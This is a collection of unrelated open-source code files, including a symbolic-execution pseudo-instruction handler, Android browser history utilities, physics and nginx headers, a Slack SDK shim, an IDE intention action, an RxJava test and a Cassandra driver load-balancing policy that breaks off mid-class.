  if (!get_support(instr)) {
    error_ = "Instruction not supported by pseudo handler";
    return;
  }
  auto lbl = instr.get_operand<Label>(0).get_text();

  // [0] .move_FFF_TTT_r0_r1_r2: split r0 into (r1=low, r2=high) when FFF > TTT,
  // or join (r0=low, r1=high) into r2 when FFF < TTT.  Widths are in bits.
  smatch result;
  regex split_move_r(supported_regex_[0]);
  if (regex_match(lbl, result, split_move_r)) {
    auto from = stoi(result[1]);
    auto to = stoi(result[2]);
    auto r0 = reg_map_.at(result[3]);
    auto r1 = reg_map_.at(result[4]);
    auto r2 = reg_map_.at(result[5]);
    if (from > to) {
      // Split: low half of r0 -> r1, high half -> r2.
      assert(from == 2*to);
      assert(r0.size() == from);
      assert(r1.size() == to);
      assert(r2.size() == to);
      ss.set(r1, ss[r0][to-1][0]);
      ss.set(r2, ss[r0][2*to-1][to]);
      return;
    } else {
      // Join: r2 = r1 (high bits) ++ r0 (low bits).
      assert(2*from == to);
      assert(r0.size() == from);
      assert(r1.size() == from);
      assert(r2.size() == to);
      ss.set(r2, ss[r1][from-1][0] || ss[r0][from-1][0]);
      return;
    }
  }

  // [1] .set_<flag>: force a flag to true.
  regex set_flag_r(supported_regex_[1]);
  if (regex_match(lbl, result, set_flag_r)) {
    auto flag = eflag_map_.at(result[1]);
    ss.set(flag, SymBool::constant(true));
    return;
  }

  // [2] .clear_<flag>: force a flag to false.
  regex clear_flag_r(supported_regex_[2]);
  if (regex_match(lbl, result, clear_flag_r)) {
    auto flag = eflag_map_.at(result[1]);
    ss.set(flag, SymBool::constant(false));
    return;
  }

  // [3] .set_szp_for_<reg>: recompute SF/ZF/PF from the register's value.
  regex flags_acc_res_r(supported_regex_[3]);
  if (regex_match(lbl, result, flags_acc_res_r)) {
    auto reg = reg_map_.at(result[1]);
    ss.set_szp_flags(ss[reg], reg.size());
    return;
  }

  // [4] .read_<flag>_into_<reg>: zero-extend a flag bit into a 64-bit register.
  regex read_flag_r(supported_regex_[4]);
  if (regex_match(lbl, result, read_flag_r)) {
    auto flag = eflag_map_.at(result[1]);
    auto reg = reg_map_.at(result[2]);
    ss.set(reg, SymBitVector::constant(63, 0) || SymBitVector::from_bool(ss[flag]));
    return;
  }

  // [5] .move_byte_<i>_of_<from>_to_<to>: extract byte i of 'from' into 'to'.
  regex byte_from_gp_r(supported_regex_[5]);
  if (regex_match(lbl, result, byte_from_gp_r)) {
    auto i = stoi(result[1]);
    auto from = reg_map_.at(result[2]);
    auto to = reg_map_.at(result[3]);
    ss.set(to, ss[from][(i+1)*8-1][i*8]);
    return;
  }

  // [6] .move_<from>_to_byte_<i>_of_<to>: overwrite byte i of 'to' with 'from',
  // preserving the surrounding bits.  The boundary bytes need special casing so
  // we never take a zero-width slice of 'to'.
  regex byte_to_gp_r(supported_regex_[6]);
  if (regex_match(lbl, result, byte_to_gp_r)) {
    auto from = reg_map_.at(result[1]);
    auto i = stoi(result[2]);
    auto to = reg_map_.at(result[3]);
    if ((i+1)*8 == to.size()) {
      ss.set(to, ss[from] || ss[to][i*8-1][0]);
    } else if (i == 0) {
      ss.set(to, ss[to][to.size()-1][(i+1)*8] || ss[from]);
    } else {
      ss.set(to, ss[to][to.size()-1][(i+1)*8] || ss[from] || ss[to][i*8-1][0]);
    }
    return;
  }

  // [7] .write_<reg>_to_<flag>: set the flag from bit 0 of the register.
  regex write_flag_r(supported_regex_[7]);
  if (regex_match(lbl, result, write_flag_r)) {
    auto reg = reg_map_.at(result[1]);
    auto flag = eflag_map_.at(result[2]);
    ss.set(flag, ss[reg][0]);
    return;
  }

  // [8] 4-way split/join of a vector register into/from four 32-bit lanes.
  regex split_move_4x_r(supported_regex_[8]);
  if (regex_match(lbl, result, split_move_4x_r)) {
    auto from = stoi(result[1]);
    auto to = stoi(result[2]);
    auto r0 = reg_map_.at(result[3]);
    auto r1 = reg_map_.at(result[4]);
    auto r2 = reg_map_.at(result[5]);
    auto r3 = reg_map_.at(result[6]);
    auto r4 = reg_map_.at(result[7]);
    if (from > to) {
      // Split: lanes of r0 go to r1..r4 (low to high).  When the targets are
      // 128-bit registers the upper 96 bits are zeroed.
      assert(from == 128);
      assert(to == 32);
      if (r1.size() == 128) {
        ss.set(r1, SymBitVector::constant(to*3, 0) || ss[r0][1*to-1][0*to]);
        ss.set(r2, SymBitVector::constant(to*3, 0) || ss[r0][2*to-1][1*to]);
        ss.set(r3, SymBitVector::constant(to*3, 0) || ss[r0][3*to-1][2*to]);
        ss.set(r4, SymBitVector::constant(to*3, 0) || ss[r0][4*to-1][3*to]);
      } else {
        ss.set(r1, ss[r0][1*to-1][0*to]);
        ss.set(r2, ss[r0][2*to-1][1*to]);
        ss.set(r3, ss[r0][3*to-1][2*to]);
        ss.set(r4, ss[r0][4*to-1][3*to]);
      }
      return;
    } else {
      // Join: r4 = r3 ++ r2 ++ r1 ++ r0 (high to low lanes).
      assert(from == 32);
      assert(to == 128);
      ss.set(r4, ss[r3][from-1][0] || ss[r2][from-1][0] || ss[r1][from-1][0] || ss[r0][from-1][0]);
      return;
    }
  }

  // [9] 2-way split/join of a vector register into/from two 64-bit halves.
  regex split_move_2x_r(supported_regex_[9]);
  if (regex_match(lbl, result, split_move_2x_r)) {
    auto from = stoi(result[1]);
    auto to = stoi(result[2]);
    auto r0 = reg_map_.at(result[3]);
    auto r1 = reg_map_.at(result[4]);
    auto r2 = reg_map_.at(result[5]);
    if (from > to) {
      // Split: halves of r0 -> (r1, r2), each zero-extended to 128 bits.
      assert(from == 128);
      assert(to == 64);
      ss.set(r1, SymBitVector::constant(to, 0) || ss[r0][1*to-1][0*to]);
      ss.set(r2, SymBitVector::constant(to, 0) || ss[r0][2*to-1][1*to]);
      return;
    } else {
      // Join: r2 = r1 (high half) ++ r0 (low half).
      assert(from == 64);
      assert(to == 128);
      ss.set(r2, ss[r1][from-1][0] || ss[r0][from-1][0]);
      return;
    }
  }

  // Unreachable in practice: get_support() only admits labels matched by one
  // of the patterns handled above.  Record a diagnostic instead of writing the
  // label to stdout (leftover debug output in the original).
  error_ = "PseudoHandler could not decode pseudo label: " + lbl;
  assert(false);
}
| 4,756 |
14,668 | // Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package org.chromium.chrome.browser.history;
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import org.chromium.base.ContextUtils;
import org.chromium.chrome.browser.IntentHandler;
import org.chromium.chrome.browser.tab.Tab;
import org.chromium.components.embedder_support.util.UrlConstants;
import org.chromium.content_public.browser.LoadUrlParams;
import org.chromium.ui.base.DeviceFormFactor;
/**
* Utility methods for the browsing history manager.
*/
public class HistoryManagerUtils {
/**
 * Opens the browsing history manager: as a native-page tab on tablets, or as a
 * dedicated {@link HistoryActivity} on phones.
 *
 * @param activity The {@link Activity} that owns the {@link HistoryManager}.
 * @param tab The {@link Tab} used to display the native page version of the
 * {@link HistoryManager} (tablet only).
 * @param isIncognitoSelected Whether the incognito {@TabModelSelector} is selected.
 */
public static void showHistoryManager(Activity activity, Tab tab, boolean isIncognitoSelected) {
Context appContext = ContextUtils.getApplicationContext();
if (DeviceFormFactor.isNonMultiDisplayContextOnTablet(activity)) {
// History shows up as a tab on tablets.
LoadUrlParams params = new LoadUrlParams(UrlConstants.NATIVE_HISTORY_URL);
tab.loadUrl(params);
} else {
// Phones get a separate activity; pass the caller and incognito state along.
Intent intent = new Intent();
intent.setClass(appContext, HistoryActivity.class);
intent.putExtra(IntentHandler.EXTRA_PARENT_COMPONENT, activity.getComponentName());
intent.putExtra(IntentHandler.EXTRA_INCOGNITO_MODE, isIncognitoSelected);
activity.startActivity(intent);
}
}
}
| 648 |
852 | <reponame>ckamtsikis/cmssw<gh_stars>100-1000
//
#ifndef METCorrectorParameters_h
#define METCorrectorParameters_h
#include "CondFormats/Serialization/interface/Serializable.h"
#include <string>
#include <vector>
#include <algorithm>
#include <iostream>
#include "FWCore/Utilities/interface/Exception.h"
#include "FWCore/MessageLogger/interface/MessageLogger.h"
class METCorrectorParameters {
//---------------- METCorrectorParameters class ----------------
//-- Encapsulates all the information of the parametrization ---
public:
//---------------- Definitions class ---------------------------
//-- Global iformation about the parametrization is kept here --
class Definitions {
public:
//-------- Constructors --------------
Definitions() {}
// fVar: binning variable names; fParVar: parametrization variable names;
// fFormula: the correction formula text.
Definitions(const std::vector<std::string>& fVar,
const std::vector<std::string>& fParVar,
const std::string& fFormula);
// Parses one definitions line from a text payload (defined out of line).
Definitions(const std::string& fLine);
//-------- Member functions ----------
unsigned nBinVar() const { return mBinVar.size(); }
unsigned nParVar() const { return mParVar.size(); }
std::vector<std::string> parVar() const { return mParVar; }
std::vector<std::string> binVar() const { return mBinVar; }
// Unchecked indexed access (operator[]): callers must stay within nParVar()/nBinVar().
std::string parVar(unsigned fIndex) const { return mParVar[fIndex]; }
std::string binVar(unsigned fIndex) const { return mBinVar[fIndex]; }
std::string formula() const { return mFormula; }
private:
//-------- Member variables ----------
int ptclType;
std::string mFormula;
std::vector<std::string> mParVar;
std::vector<std::string> mBinVar;
COND_SERIALIZABLE;
};
//---------------- Record class --------------------------------
//-- Each Record holds the properties of a bin -----------------
class Record {
public:
//-------- Constructors --------------
Record() : mNvar(0), mMin(0), mMax(0), mParameters(0) {}
Record(unsigned fNvar,
const std::vector<float>& fXMin,
const std::vector<float>& fXMax,
const std::vector<float>& fParameters)
: mNvar(fNvar), mMin(fXMin), mMax(fXMax), mParameters(fParameters) {}
Record(const std::string& fLine, unsigned fNvar);
//-------- Member functions ----------
float xMin(unsigned fVar) const { return mMin[fVar]; }
float xMax(unsigned fVar) const { return mMax[fVar]; }
float xMiddle(unsigned fVar) const { return 0.5 * (xMin(fVar) + xMax(fVar)); }
float parameter(unsigned fIndex) const { return mParameters[fIndex]; }
std::vector<float> parameters() const { return mParameters; }
unsigned nParameters() const { return mParameters.size(); }
int operator<(const Record& other) const { return xMin(0) < other.xMin(0); }
private:
//-------- Member variables ----------
unsigned mNvar;
std::vector<float> mMin;
std::vector<float> mMax;
std::vector<float> mParameters;
COND_SERIALIZABLE;
};
//-------- Constructors --------------
METCorrectorParameters() { valid_ = false; }
METCorrectorParameters(const std::string& fFile, const std::string& fSection = "");
METCorrectorParameters(const METCorrectorParameters::Definitions& fDefinitions,
const std::vector<METCorrectorParameters::Record>& fRecords)
: mDefinitions(fDefinitions), mRecords(fRecords) {
valid_ = true;
}
//-------- Member functions ----------
const Record& record(unsigned fBin) const { return mRecords[fBin]; }
const Definitions& definitions() const { return mDefinitions; }
unsigned size() const { return mRecords.size(); }
unsigned size(unsigned fVar) const;
int binIndex(const std::vector<float>& fX) const;
int neighbourBin(unsigned fIndex, unsigned fVar, bool fNext) const;
std::vector<float> binCenters(unsigned fVar) const;
void printScreen() const;
void printFile(const std::string& fFileName) const;
bool isValid() const { return valid_; }
private:
//-------- Member variables ----------
METCorrectorParameters::Definitions mDefinitions;
std::vector<METCorrectorParameters::Record> mRecords;
bool valid_; /// is this a valid set?
COND_SERIALIZABLE;
};
class METCorrectorParametersCollection {
public:
  // Correction levels; only MiniAod exists at the moment.
  enum Level_t { MiniAod = 0, N_LEVELS = 1 };

  typedef int key_type;
  typedef std::string label_type;
  typedef METCorrectorParameters value_type;
  typedef std::pair<key_type, value_type> pair_type;
  typedef std::vector<pair_type> collection_type;

  // Constructor: start from an empty collection. (The original comment mentioned
  // "all three vectors"; only the MiniAod collection exists here.)
  METCorrectorParametersCollection() { correctionsMiniAod_.clear(); }

  // Add a METCorrectorParameter object, for each source
  void push_back(key_type i, value_type const& j, label_type const& source = "");

  // Access the METCorrectorParameter via the key k.
  // key_type is hashed to deal with the three collections
  METCorrectorParameters const& operator[](key_type k) const;

  // Access the METCorrectorParameter via a string.
  // Will find the hashed value for the label, and call via that operator.
  METCorrectorParameters const& operator[](std::string const& label) const { return operator[](findKey(label)); }

  // Get a list of valid keys. These will contain hashed keys
  // that are aware of all three collections.
  void validKeys(std::vector<key_type>& keys) const;

  // Helper method to find all of the sections in a given parameters file
  static void getSections(std::string inputFile, std::vector<std::string>& outputs);

  // Find the MiniAod bin for hashing
  static key_type getMiniAodBin(std::string const& source);
  static bool isMiniAod(key_type k);
  static std::string findLabel(key_type k);
  static std::string findMiniAodSource(key_type k);

protected:
  // Find the key corresponding to each label
  key_type findKey(std::string const& label) const;

  collection_type correctionsMiniAod_;  // stored (key, parameters) pairs for the MiniAod level

  COND_SERIALIZABLE;
};
#endif
| 1,902 |
2,486 | <filename>slack/__init__.py
import logging
from logging import NullHandler

from slack import deprecation

# Warn once that the legacy `slack` package has been superseded by `slack_sdk`.
# This must run before the slack_sdk re-exports below so the message points users
# at the replacement modules.
deprecation.show_message(__name__, "slack_sdk.web/webhook/rtm")

# Re-export the slack_sdk client classes under the legacy `slack` namespace so
# existing `from slack import WebClient`-style imports keep working.
from slack_sdk.rtm import RTMClient  # noqa
from slack_sdk.web.async_client import AsyncWebClient  # noqa
from slack_sdk.web.legacy_client import LegacyWebClient as WebClient  # noqa
from slack_sdk.webhook.async_client import AsyncWebhookClient  # noqa
from slack_sdk.webhook.client import WebhookClient  # noqa

# Set default logging handler to avoid "No handler found" warnings.
logging.getLogger(__name__).addHandler(NullHandler())
| 198 |
735 | <reponame>1443213244/small-package
/*
* Copyright (C) AlexWoo(<NAME>) <EMAIL>
*/
#ifndef _NGX_LIVE_RECORD_H_INCLUDED_
#define _NGX_LIVE_RECORD_H_INCLUDED_
#include <ngx_config.h>
#include <ngx_core.h>
#include "ngx_rtmp.h"
#include "hls/ngx_rtmp_mpegts.h"
/* Per-session recording context. */
typedef struct {
    unsigned                open; /* 0 close, 1 open, 2 wait for key */
    time_t                  last_time;     /* NOTE(review): presumably last write/index time — confirm */
    ngx_file_t              index;         /* index file for the recording */
    ngx_rtmp_mpegts_file_t  ts;            /* MPEG-TS writer state */
    ngx_file_t              file;          /* current record file */
    ngx_rtmp_publish_t      pubv;          /* publish parameters of the recorded stream */
    ngx_uint_t              audio_cc;      /* MPEG-TS continuity counter, audio PID */
    ngx_uint_t              video_cc;      /* MPEG-TS continuity counter, video PID */
    ngx_msec_t              begintime;     /* NOTE(review): begin vs start semantics not visible here — confirm */
    ngx_msec_t              starttime;     /* fragment start timestamp (ms) — TODO confirm */
    ngx_msec_t              endtime;       /* fragment end timestamp (ms) — TODO confirm */
    off_t                   startsize;     /* file size at fragment start */
    off_t                   endsize;       /* file size at fragment end */
    ngx_msec_t              publish_epoch; /* timestamp when publishing began — TODO confirm */
    ngx_msec_t              basetime;      /* timestamp base offset — TODO confirm */
} ngx_live_record_ctx_t;

/* Hook signatures fired around a recording's lifecycle; modules may chain by
 * saving and replacing the function pointers below. */
typedef ngx_int_t (*ngx_live_record_start_pt)(ngx_rtmp_session_t *s);
typedef ngx_int_t (*ngx_live_record_update_pt)(ngx_rtmp_session_t *s);
typedef ngx_int_t (*ngx_live_record_done_pt)(ngx_rtmp_session_t *s);

/* Overridable hook chain heads (defined in the module's .c file). */
extern ngx_live_record_start_pt ngx_live_record_start;
extern ngx_live_record_update_pt ngx_live_record_update;
extern ngx_live_record_done_pt ngx_live_record_done;

extern ngx_module_t ngx_live_record_module;

/* Open/close the record for a session; return NULL on success or an error string. */
const char *ngx_live_record_open(ngx_rtmp_session_t *s);
const char *ngx_live_record_close(ngx_rtmp_session_t *s);
#endif
| 882 |
634 | <gh_stars>100-1000
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.intellij.codeInsight.intention.choice;
import com.intellij.codeInsight.daemon.impl.HighlightInfoType;
import com.intellij.codeInsight.intention.CustomizableIntentionAction;
import com.intellij.codeInsight.intention.IntentionAction;
import com.intellij.codeInspection.IntentionAndQuickFixAction;
import com.intellij.openapi.util.Iconable;
import consulo.ui.image.Image;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
/**
 * Intention action that is used as a variant of {@code IntentionActionWithChoice}.
 * <p>
 * Subclasses should implement {@code invoke}; requests to {@code applyFix} are proxied to
 * {@code invoke}.
 * <p>
 * Actions require an {@link #getIndex() index} so the popup can maintain a stable order of
 * variants.
 */
public abstract class ChoiceVariantIntentionAction extends IntentionAndQuickFixAction implements HighlightInfoType.Iconable, Iconable, CustomizableIntentionAction, Comparable<IntentionAction> {
    /** @return the position of this variant among its siblings, used for popup ordering. */
    public abstract int getIndex();

    @Override
    public boolean isSelectable() {
        return true;
    }

    @Override
    public boolean isShowSubmenu() {
        return false;
    }

    @Override
    public boolean isShowIcon() {
        return true;
    }

    /** Variants reserve icon space with an empty icon so text stays aligned in the popup. */
    @Nullable
    @Override
    public Image getIcon() {
        return Image.empty(Image.DEFAULT_ICON_SIZE);
    }

    @Nullable
    @Override
    public Image getIcon(@IconFlags int flags) {
        return getIcon();
    }

    /**
     * Orders actions first by family name, then places the choice title before its variants,
     * then orders variants by their index.
     */
    @Override
    public int compareTo(@Nonnull IntentionAction other) {
        if (!getFamilyName().equals(other.getFamilyName())) {
            return this.getFamilyName().compareTo(other.getFamilyName());
        }
        // The title action of the same family always sorts before its variants.
        if (other instanceof ChoiceTitleIntentionAction) {
            return 1;
        }
        if (other instanceof ChoiceVariantIntentionAction) {
            // Integer.compare avoids the integer-overflow hazard of the subtraction idiom
            // (this.getIndex() - other.getIndex()) for extreme index values.
            return Integer.compare(this.getIndex(), ((ChoiceVariantIntentionAction)other).getIndex());
        }
        return 0;
    }
}
| 615 |
303 | <gh_stars>100-1000
package com.github.davidmoten.rx.testing;
import java.util.concurrent.TimeUnit;
import junit.framework.TestCase;
import junit.framework.TestSuite;
import rx.Observable;
import rx.functions.Func1;
import rx.schedulers.Schedulers;
public class OperatorCacheHelperTest extends TestCase {

    // Function under test: caches the source observable, then subscribes three delayed
    // consumers (on computation schedulers) so the cache is replayed concurrently. The
    // returned observable is the cached stream with an extra 100ms delay.
    private static final Func1<Observable<Integer>, Observable<Integer>> FUNCTION = new Func1<Observable<Integer>, Observable<Integer>>() {
        @Override
        public Observable<Integer> call(Observable<Integer> o) {
            Observable<Integer> c = o.cache();
            // Two extra subscriptions exercise concurrent replay from the cache.
            c.delay(100, TimeUnit.MILLISECONDS).subscribeOn(Schedulers.computation()).subscribe();
            c.delay(50, TimeUnit.MILLISECONDS).subscribeOn(Schedulers.computation()).subscribe();
            return c.delay(100, TimeUnit.MILLISECONDS).subscribeOn(Schedulers.computation());
        }
    };

    // Builds the JUnit suite: caching must preserve emptiness and element order.
    public static TestSuite suite() {
        return TestingHelper.function(FUNCTION)
                // test empty
                .name("testCacheOfEmptyReturnsEmpty").fromEmpty().expectEmpty()
                //
                .name("testCacheOfSomeReturnsSome").from(1, 2, 3, 4, 5).expect(1, 2, 3, 4, 5)
                // get test suites
                .testSuite(TestingHelperCountTest.class);
    }

    public void testDummy() {
        // just here to fool eclipse
    }
}
| 591 |
984 | /*
* Copyright DataStax, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.datastax.oss.driver.internal.core.loadbalancing;
import static java.util.concurrent.TimeUnit.MILLISECONDS;
import static java.util.concurrent.TimeUnit.MINUTES;
import com.datastax.oss.driver.api.core.config.DefaultDriverOption;
import com.datastax.oss.driver.api.core.config.DriverExecutionProfile;
import com.datastax.oss.driver.api.core.context.DriverContext;
import com.datastax.oss.driver.api.core.metadata.Node;
import com.datastax.oss.driver.api.core.session.Request;
import com.datastax.oss.driver.api.core.session.Session;
import com.datastax.oss.driver.api.core.tracker.RequestTracker;
import com.datastax.oss.driver.internal.core.loadbalancing.helper.MandatoryLocalDcHelper;
import com.datastax.oss.driver.internal.core.pool.ChannelPool;
import com.datastax.oss.driver.internal.core.session.DefaultSession;
import com.datastax.oss.driver.internal.core.util.ArrayUtils;
import com.datastax.oss.driver.internal.core.util.collection.QueryPlan;
import com.datastax.oss.driver.internal.core.util.collection.SimpleQueryPlan;
import edu.umd.cs.findbugs.annotations.NonNull;
import edu.umd.cs.findbugs.annotations.Nullable;
import java.util.BitSet;
import java.util.Map;
import java.util.Optional;
import java.util.Queue;
import java.util.Set;
import java.util.UUID;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ThreadLocalRandom;
import java.util.concurrent.atomic.AtomicLongArray;
import net.jcip.annotations.ThreadSafe;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* The default load balancing policy implementation.
*
* <p>To activate this policy, modify the {@code basic.load-balancing-policy} section in the driver
* configuration, for example:
*
* <pre>
* datastax-java-driver {
* basic.load-balancing-policy {
* class = DefaultLoadBalancingPolicy
* local-datacenter = datacenter1
* }
* }
* </pre>
*
* See {@code reference.conf} (in the manual or core driver JAR) for more details.
*
* <p><b>Local datacenter</b>: This implementation requires a local datacenter to be defined,
* otherwise it will throw an {@link IllegalStateException}. A local datacenter can be supplied
* either:
*
* <ol>
* <li>Programmatically with {@link
* com.datastax.oss.driver.api.core.session.SessionBuilder#withLocalDatacenter(String)
* SessionBuilder#withLocalDatacenter(String)};
* <li>Through configuration, by defining the option {@link
* DefaultDriverOption#LOAD_BALANCING_LOCAL_DATACENTER
* basic.load-balancing-policy.local-datacenter};
* <li>Or implicitly, if and only if no explicit contact points were provided: in this case this
* implementation will infer the local datacenter from the implicit contact point (localhost).
* </ol>
*
* <p><b>Query plan</b>: This implementation prioritizes replica nodes over non-replica ones; if
* more than one replica is available, the replicas will be shuffled; if more than 2 replicas are
* available, they will be ordered from most healthy to least healthy ("Power of 2 choices" or busy
* node avoidance algorithm). Non-replica nodes will be included in a round-robin fashion. If the
* local datacenter is defined (see above), query plans will only include local nodes, never remote
* ones; if it is unspecified however, query plans may contain nodes from different datacenters.
*/
@ThreadSafe
public class DefaultLoadBalancingPolicy extends BasicLoadBalancingPolicy implements RequestTracker {

  private static final Logger LOG = LoggerFactory.getLogger(DefaultLoadBalancingPolicy.class);

  // How long after its last recorded UP event a node is considered "newly up"; newly-up
  // replicas are deprioritized most of the time (see newQueryPlan) to let them warm up.
  private static final long NEWLY_UP_INTERVAL_NANOS = MINUTES.toNanos(1);

  // In-flight request count at or above which a node is considered busy.
  private static final int MAX_IN_FLIGHT_THRESHOLD = 10;

  // Window within which a node must have produced at least 2 responses to be
  // considered responsive (see isResponseRateInsufficient).
  private static final long RESPONSE_COUNT_RESET_INTERVAL_NANOS = MILLISECONDS.toNanos(200);

  // Per-node timestamps (nanoTime) of up to the two most recent responses;
  // index 0 is always the least recent of the two. Maintained by updateResponseTimes.
  protected final Map<Node, AtomicLongArray> responseTimes = new ConcurrentHashMap<>();

  // Per-node timestamp (nanoTime) of the node's most recent transition to UP.
  // NOTE(review): only read in this class; presumably populated elsewhere — confirm.
  protected final Map<Node, Long> upTimes = new ConcurrentHashMap<>();

  // Whether busy-node avoidance is enabled (config: load-balancing-policy.slow-avoidance).
  private final boolean avoidSlowReplicas;

  public DefaultLoadBalancingPolicy(@NonNull DriverContext context, @NonNull String profileName) {
    super(context, profileName);
    this.avoidSlowReplicas =
        profile.getBoolean(DefaultDriverOption.LOAD_BALANCING_POLICY_SLOW_AVOIDANCE, true);
  }

  /** Registers this policy as a request tracker only when slow-replica avoidance is on. */
  @NonNull
  @Override
  public Optional<RequestTracker> getRequestTracker() {
    if (avoidSlowReplicas) {
      return Optional.of(this);
    } else {
      return Optional.empty();
    }
  }

  /** A local DC is mandatory for this policy: the helper throws if none can be determined. */
  @NonNull
  @Override
  protected Optional<String> discoverLocalDc(@NonNull Map<UUID, Node> nodes) {
    return new MandatoryLocalDcHelper(context, profile, logPrefix).discoverLocalDc(nodes);
  }

  /**
   * Builds a query plan with replicas first (shuffled, then reordered to avoid busy, unhealthy
   * or newly-up replicas), followed by the remaining local nodes in round-robin order.
   */
  @NonNull
  @Override
  public Queue<Node> newQueryPlan(@Nullable Request request, @Nullable Session session) {
    if (!avoidSlowReplicas) {
      return super.newQueryPlan(request, session);
    }
    // Take a snapshot since the set is concurrent:
    Object[] currentNodes = getLiveNodes().dc(getLocalDatacenter()).toArray();
    Set<Node> allReplicas = getReplicas(request, session);
    int replicaCount = 0; // in currentNodes
    if (!allReplicas.isEmpty()) {
      // Move replicas to the beginning of the plan
      for (int i = 0; i < currentNodes.length; i++) {
        Node node = (Node) currentNodes[i];
        if (allReplicas.contains(node)) {
          ArrayUtils.bubbleUp(currentNodes, i, replicaCount);
          replicaCount++;
        }
      }
      if (replicaCount > 1) {
        shuffleHead(currentNodes, replicaCount);
        if (replicaCount > 2) {
          assert session != null;
          // Test replicas health
          Node newestUpReplica = null;
          BitSet unhealthyReplicas = null; // bit mask storing indices of unhealthy replicas
          long mostRecentUpTimeNanos = -1;
          long now = nanoTime();
          for (int i = 0; i < replicaCount; i++) {
            Node node = (Node) currentNodes[i];
            assert node != null;
            Long upTimeNanos = upTimes.get(node);
            // Track the replica that came up most recently within the newly-up window.
            if (upTimeNanos != null
                && now - upTimeNanos - NEWLY_UP_INTERVAL_NANOS < 0
                && upTimeNanos - mostRecentUpTimeNanos > 0) {
              newestUpReplica = node;
              mostRecentUpTimeNanos = upTimeNanos;
            }
            // Health is only evaluated while no newly-up replica has been found; once one is
            // found, the newly-up branch below takes precedence over the unhealthy branch.
            if (newestUpReplica == null && isUnhealthy(node, session, now)) {
              if (unhealthyReplicas == null) {
                unhealthyReplicas = new BitSet(replicaCount);
              }
              unhealthyReplicas.set(i);
            }
          }
          // When:
          // - there isn't any newly UP replica and
          // - there is one or more unhealthy replicas and
          // - there is a majority of healthy replicas
          int unhealthyReplicasCount =
              unhealthyReplicas == null ? 0 : unhealthyReplicas.cardinality();
          if (newestUpReplica == null
              && unhealthyReplicasCount > 0
              && unhealthyReplicasCount < (replicaCount / 2.0)) {
            // Reorder the unhealthy replicas to the back of the list
            // Start from the back of the replicas, then move backwards;
            // stop once all unhealthy replicas are moved to the back.
            int counter = 0;
            for (int i = replicaCount - 1; i >= 0 && counter < unhealthyReplicasCount; i--) {
              if (unhealthyReplicas.get(i)) {
                ArrayUtils.bubbleDown(currentNodes, i, replicaCount - 1 - counter);
                counter++;
              }
            }
          }
          // When:
          // - there is a newly UP replica and
          // - the replica in first or second position is the most recent replica marked as UP and
          // - dice roll 1d4 != 1 (diceRoll1d4 returns 0..3, so the newly-up replica is kept in
          //   front with probability 1/4 and demoted otherwise)
          else if ((newestUpReplica == currentNodes[0] || newestUpReplica == currentNodes[1])
              && diceRoll1d4() != 1) {
            // Send it to the back of the replicas
            ArrayUtils.bubbleDown(
                currentNodes, newestUpReplica == currentNodes[0] ? 0 : 1, replicaCount - 1);
          }
          // Reorder the first two replicas in the shuffled list based on the number of
          // in-flight requests
          if (getInFlight((Node) currentNodes[0], session)
              > getInFlight((Node) currentNodes[1], session)) {
            ArrayUtils.swap(currentNodes, 0, 1);
          }
        }
      }
    }
    LOG.trace("[{}] Prioritizing {} local replicas", logPrefix, replicaCount);
    // Round-robin the remaining nodes
    ArrayUtils.rotate(
        currentNodes,
        replicaCount,
        currentNodes.length - replicaCount,
        roundRobinAmount.getAndUpdate(INCREMENT));
    QueryPlan plan = currentNodes.length == 0 ? QueryPlan.EMPTY : new SimpleQueryPlan(currentNodes);
    return maybeAddDcFailover(request, plan);
  }

  /** Records a response timestamp for the node; latency itself is not used. */
  @Override
  public void onNodeSuccess(
      @NonNull Request request,
      long latencyNanos,
      @NonNull DriverExecutionProfile executionProfile,
      @NonNull Node node,
      @NonNull String logPrefix) {
    updateResponseTimes(node);
  }

  /** Errors also count as responses: the node answered, even if unsuccessfully. */
  @Override
  public void onNodeError(
      @NonNull Request request,
      @NonNull Throwable error,
      long latencyNanos,
      @NonNull DriverExecutionProfile executionProfile,
      @NonNull Node node,
      @NonNull String logPrefix) {
    updateResponseTimes(node);
  }

  /** Exposed as a protected method so that it can be accessed by tests */
  protected long nanoTime() {
    return System.nanoTime();
  }

  /** Exposed as a protected method so that it can be accessed by tests; returns 0..3. */
  protected int diceRoll1d4() {
    return ThreadLocalRandom.current().nextInt(4);
  }

  /** A node is unhealthy when it is both busy and has an insufficient response rate. */
  protected boolean isUnhealthy(@NonNull Node node, @NonNull Session session, long now) {
    return isBusy(node, session) && isResponseRateInsufficient(node, now);
  }

  protected boolean isBusy(@NonNull Node node, @NonNull Session session) {
    return getInFlight(node, session) >= MAX_IN_FLIGHT_THRESHOLD;
  }

  protected boolean isResponseRateInsufficient(@NonNull Node node, long now) {
    // response rate is considered insufficient when less than 2 responses were obtained in
    // the past interval delimited by RESPONSE_COUNT_RESET_INTERVAL_NANOS.
    if (responseTimes.containsKey(node)) {
      AtomicLongArray array = responseTimes.get(node);
      if (array.length() == 2) {
        long threshold = now - RESPONSE_COUNT_RESET_INTERVAL_NANOS;
        long leastRecent = array.get(0);
        return leastRecent - threshold < 0;
      }
    }
    // Fewer than two responses ever recorded: treated as insufficient.
    return true;
  }

  /** Shifts the two-slot response-time window for the node, appending "now". */
  protected void updateResponseTimes(@NonNull Node node) {
    responseTimes.compute(
        node,
        (n, array) -> {
          // The array stores at most two timestamps, since we don't need more;
          // the first one is always the least recent one, and hence the one to inspect.
          long now = nanoTime();
          if (array == null) {
            array = new AtomicLongArray(1);
            array.set(0, now);
          } else if (array.length() == 1) {
            long previous = array.get(0);
            array = new AtomicLongArray(2);
            array.set(0, previous);
            array.set(1, now);
          } else {
            array.set(0, array.get(1));
            array.set(1, now);
          }
          return array;
        });
  }

